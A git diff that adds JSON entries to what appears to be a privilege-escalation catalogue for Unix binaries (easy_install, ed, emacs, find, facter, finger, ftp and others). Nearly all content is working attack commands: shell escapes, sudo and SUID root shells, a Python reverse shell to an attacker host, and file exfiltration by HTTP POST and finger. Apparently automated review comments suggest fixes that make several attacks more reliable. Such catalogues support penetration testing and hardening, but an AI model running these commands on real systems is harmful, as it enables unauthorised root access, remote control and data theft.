diff --git a/data/easy_install.json b/data/easy_install.json
new file mode 100644
index 0000000..2425db3
--- /dev/null
+++ b/data/easy_install.json
@@ -0,0 +1,53 @@
+{
+ "functions": {
+ "shell": [
+ {
+ "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\neasy_install $TF\n"
+ }
+ ],
+ "reverse-shell": [
+ {
+ "description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+ "code": "TF=$(mktemp -d)\necho 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")' > $TF/setup.py\neasy_install $TF\n"
+ }
+ ],
+ "file-upload": [
+ {
+ "description": "Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. The file path must be absolute.",
+ "code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))' > $TF/setup.py\neasy_install $TF\n"
+ },
+ {
+ "description": "Serve files in the local folder running an HTTP server. ",
+ "code": "TF=$(mktemp -d)\necho 'import sys; from os import environ as e\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py\neasy_install $TF\n"
+ }
+ ],
+ "file-download": [
+ {
+ "description": "Fetch a remote file via HTTP GET request. The file path must be absolute.",
+ "code": "TF=$(mktemp -d)\necho \"import os;\nos.execl('$(whereis python)', '$(whereis python)', '-c', \\\"\\\"\\\"import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve('[url]', '[file]')\\\"\\\"\\\")\" > $TF/setup.py\npip install $TF\n"
+ }
+ ],
+ "file-write": [
+ {
+ "description": "The file path must be absolute.",
+ "code": "TF=$(mktemp -d)\necho \"import os;\nos.execl('$(whereis python)', 'python', '-c', 'open(\\\"[file]\\\",\\\"w+\\\").write(\\\"DATA\\\")')\" > $TF/setup.py\neasy_install $TF\n"
+ }
+ ],
+ "file-read": [
+ {
+ "description": "The read file content is wrapped within program messages. The file path must be absolute.",
+ "code": "TF=$(mktemp -d)\necho 'print(open(\"[file]\").read())' > $TF/setup.py\neasy_install $TF\n"
+ }
+ ],
+ "library-load": [
+ {
+ "code": "TF=$(mktemp -d)\necho 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")' > $TF/setup.py\neasy_install $TF\n"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\nsudo easy_install $TF\n"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/data/ed.json b/data/ed.json
new file mode 100644
index 0000000..6bb58a6
--- /dev/null
+++ b/data/ed.json
@@ -0,0 +1,29 @@
+{
+ "functions": {
+ "shell": [
+ {
+ "code": "ed\n!/bin/sh\n"
+ }
+ ],
+ "file-write": [
+ {
+ "code": "ed [file]\na\nDATA\n.\nw\nq\n"
+ }
+ ],
+ "file-read": [
+ {
+ "code": "ed [file]\n,p\nq\n"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "sudo ed\n!/bin/sh\n"
+ }
+ ],
+ "limited-suid": [
+ {
+ "code": "./ed\n!/bin/sh\n"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/data/emacs.json b/data/emacs.json
new file mode 100644
index 0000000..bba8a93
--- /dev/null
+++ b/data/emacs.json
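Review bot: The `file-download` entry finishes with `pip install $TF`, while the file is easy_install.json and every other entry in it runs `easy_install $TF`; the last line of that code string should be `easy_install $TF\n`. The `file-download` and `file-write` entries also splice `$(whereis python)` into the `os.execl` path, and on most Linux systems `whereis` prints `python: /usr/bin/python ...` (the name plus every match) rather than a bare path, so the expanded string is unlikely to be a single existing executable; `$(command -v python)` yields one resolvable path and would make those two entries behave like the rest.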
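Review bot: The `file-write` entry's `a` command appends DATA after the last line of an existing [file] rather than replacing its contents, which the catalog's other file-write entries do not make explicit here; either add `"description": "DATA is appended to the end of the file; issue ',d' first to overwrite an existing file."` or insert a delete step before `a` so the script's outcome matches the function name.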
@@ -0,0 +1,29 @@
+{
+ "functions": {
+ "shell": [
+ {
+ "code": "emacs -Q -nw --eval '(term \"/bin/sh\")'"
+ }
+ ],
+ "file-write": [
+ {
+ "code": "emacs [file]\nDATA\nC-x C-s\n"
+ }
+ ],
+ "file-read": [
+ {
+ "code": "emacs [file]"
+ }
+ ],
+ "suid": [
+ {
+ "code": "./emacs -Q -nw --eval '(term \"/bin/sh -p\")'"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "sudo emacs -Q -nw --eval '(term \"/bin/sh\")'"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/data/env.json b/data/env.json
new file mode 100644
index 0000000..8aff973
--- /dev/null
+++ b/data/env.json
@@ -0,0 +1,19 @@
+{
+ "functions": {
+ "shell": [
+ {
+ "code": "env /bin/sh"
+ }
+ ],
+ "suid": [
+ {
+ "code": "./env /bin/sh -p"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "sudo env /bin/sh"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/data/expand.json b/data/expand.json
new file mode 100644
index 0000000..8289eab
--- /dev/null
+++ b/data/expand.json
@@ -0,0 +1,20 @@
+{
+ "description": "The read file content is corrupted by replacing tabs with spaces.",
+ "functions": {
+ "file-read": [
+ {
+ "code": "expand \"[file]\"\n"
+ }
+ ],
+ "suid": [
+ {
+ "code": "./expand \"[file]\"\n"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "sudo expand \"[file]\"\n"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/data/expect.json b/data/expect.json
new file mode 100644
index 0000000..aba4e49
--- /dev/null
+++ b/data/expect.json
@@ -0,0 +1,19 @@
+{
+ "functions": {
+ "shell": [
+ {
+ "code": "expect -c 'spawn /bin/sh;interact'"
+ }
+ ],
+ "suid": [
+ {
+ "code": "./expect -c 'spawn /bin/sh -p;interact'"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "sudo expect -c 'spawn /bin/sh;interact'"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/data/facter.json b/data/facter.json
new file mode 100644
index 0000000..21860d2
--- /dev/null
+++ b/data/facter.json
@@ -0,0 +1,14 @@
+{
+ "functions": {
+ "shell": [
+ {
+ "code": "TF=$(mktemp -d)\necho 'exec(\"/bin/sh\")' > $TF/x.rb\nFACTERLIB=$TF facter\n"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "TF=$(mktemp -d)\necho 'exec(\"/bin/sh\")' > $TF/x.rb\nFACTERLIB=$TF sudo -E facter\n"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/data/file.json b/data/file.json
new file mode 100644
index 0000000..e8b93c9
--- /dev/null
+++ b/data/file.json
@@ -0,0 +1,20 @@
+{
+ "description": "Each line is corrupted by a prefix string and wrapped inside quotes, so this may not be suitable for binary files. If a line in the target file begins with a '#' it will not be printed as these lines are parsed as comments. It can also be provided with a directory and will read each file in the directory.",
+ "functions": {
+ "file-read": [
+ {
+ "code": "file -m [file]\n"
+ }
+ ],
+ "suid": [
+ {
+ "code": "./file -m [file]\n"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "sudo file -m [file]\n"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/data/find.json b/data/find.json
new file mode 100644
index 0000000..83cf110
--- /dev/null
+++ b/data/find.json
@@ -0,0 +1,19 @@
+{
+ "functions": {
+ "shell": [
+ {
+ "code": "find . -exec /bin/sh \\; -quit"
+ }
+ ],
+ "suid": [
+ {
+ "code": "./find . -exec /bin/sh -p \\; -quit"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "sudo find . -exec /bin/sh \\; -quit"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/data/finger.json b/data/finger.json
new file mode 100644
index 0000000..8eb06f9
--- /dev/null
+++ b/data/finger.json
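Review bot: The `sudo` entry depends on `sudo -E` carrying `FACTERLIB` into the privileged process, but sudo only accepts `-E` when the matching sudoers rule carries the `SETENV` tag or the `setenv` option is enabled; otherwise it refuses with "sorry, you are not allowed to preserve the environment", and with the default `env_reset` the variable would be stripped without `-E`. That precondition is what decides whether this entry works at all, so it belongs in the data: add `"description": "Requires a sudoers rule with the SETENV tag (or the 'setenv' option) so that 'sudo -E' is allowed to preserve FACTERLIB."` to the `sudo` object.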
@@ -0,0 +1,17 @@
+{
+ "description": "'finger' hangs waiting for the remote peer to close the socket.",
+ "functions": {
+ "file-upload": [
+ {
+ "description": "Send a binary file to a TCP port. Run 'sudo nc -l -p 79 | base64 -d > [file]' on the attacker box to collect the file. The file length is limited by the maximum size of arguments.",
+ "code": "finger \"$(base64 [file])@[host]\"\n"
+ }
+ ],
+ "file-download": [
+ {
+ "description": "Fetch remote binary file from a remote TCP port. Run 'base64 [file] | sudo nc -l -p 79' on the attacker box to send the file.",
+ "code": "finger x@[host] | base64 -d > [file]\n"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/data/flock.json b/data/flock.json
new file mode 100644
index 0000000..fe86de7
--- /dev/null
+++ b/data/flock.json
@@ -0,0 +1,19 @@
+{
+ "functions": {
+ "shell": [
+ {
+ "code": "flock -u / /bin/sh"
+ }
+ ],
+ "suid": [
+ {
+ "code": "./flock -u / /bin/sh -p"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "sudo flock -u / /bin/sh"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/data/fmt.json b/data/fmt.json
new file mode 100644
index 0000000..8f5d266
--- /dev/null
+++ b/data/fmt.json
@@ -0,0 +1,20 @@
+{
+ "description": "The read file content is not binary-safe.",
+ "functions": {
+ "file-read": [
+ {
+ "code": "fmt -p NON_EXISTING_PREFIX [file]\n"
+ }
+ ],
+ "suid": [
+ {
+ "code": "./fmt -p NON_EXISTING_PREFIX [file]\n"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "sudo fmt -p NON_EXISTING_PREFIX [file]\n"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/data/fold.json b/data/fold.json
new file mode 100644
index 0000000..22caeb8
--- /dev/null
+++ b/data/fold.json
@@ -0,0 +1,19 @@
+{
+ "functions": {
+ "file-read": [
+ {
+ "code": "fold -w99999999 [file]\n"
+ }
+ ],
+ "suid": [
+ {
+ "code": "./fold -w99999999 [file]\n"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "sudo fold -w99999999 [file]\n"
+ }
+ ]
+ }
+}
\ No newline at end of file
diff --git a/data/ftp.json b/data/ftp.json
new file mode 100644
index 0000000..2800705
--- /dev/null
+++ b/data/ftp.json
@@ -0,0 +1,26 @@
+{
+ "functions": {
+ "shell": [
+ {
+ "code": "ftp\n!/bin/sh\n"
+ }
+ ],
+ "file-upload": [
+ {
+ "description": "Send local file to a FTP server.",
+ "code": "ftp [host]\nput [file]\n"
+ }
+ ],
+ "file-download": [
+ {
+ "description": "Fetch a remote file from a FTP server.",
+ "code": "ftp [host]\nget [file]\n"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "sudo ftp\n!/bin/sh\n"
+ }
+ ]
+ }
+}
\ No newline at end of file
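Review bot: The `file-upload` and `file-download` entries issue `put`/`get` with whatever transfer type the client starts in, and several ftp clients still default to ASCII, which rewrites line endings and can corrupt binary payloads; inserting `binary` before the transfer (`"code": "ftp [host]\nbinary\nput [file]\n"` and likewise for `get`) makes both byte-exact. The descriptions would also be more useful if they noted that the session is cleartext and that the server prompts for credentials before the transfer command runs.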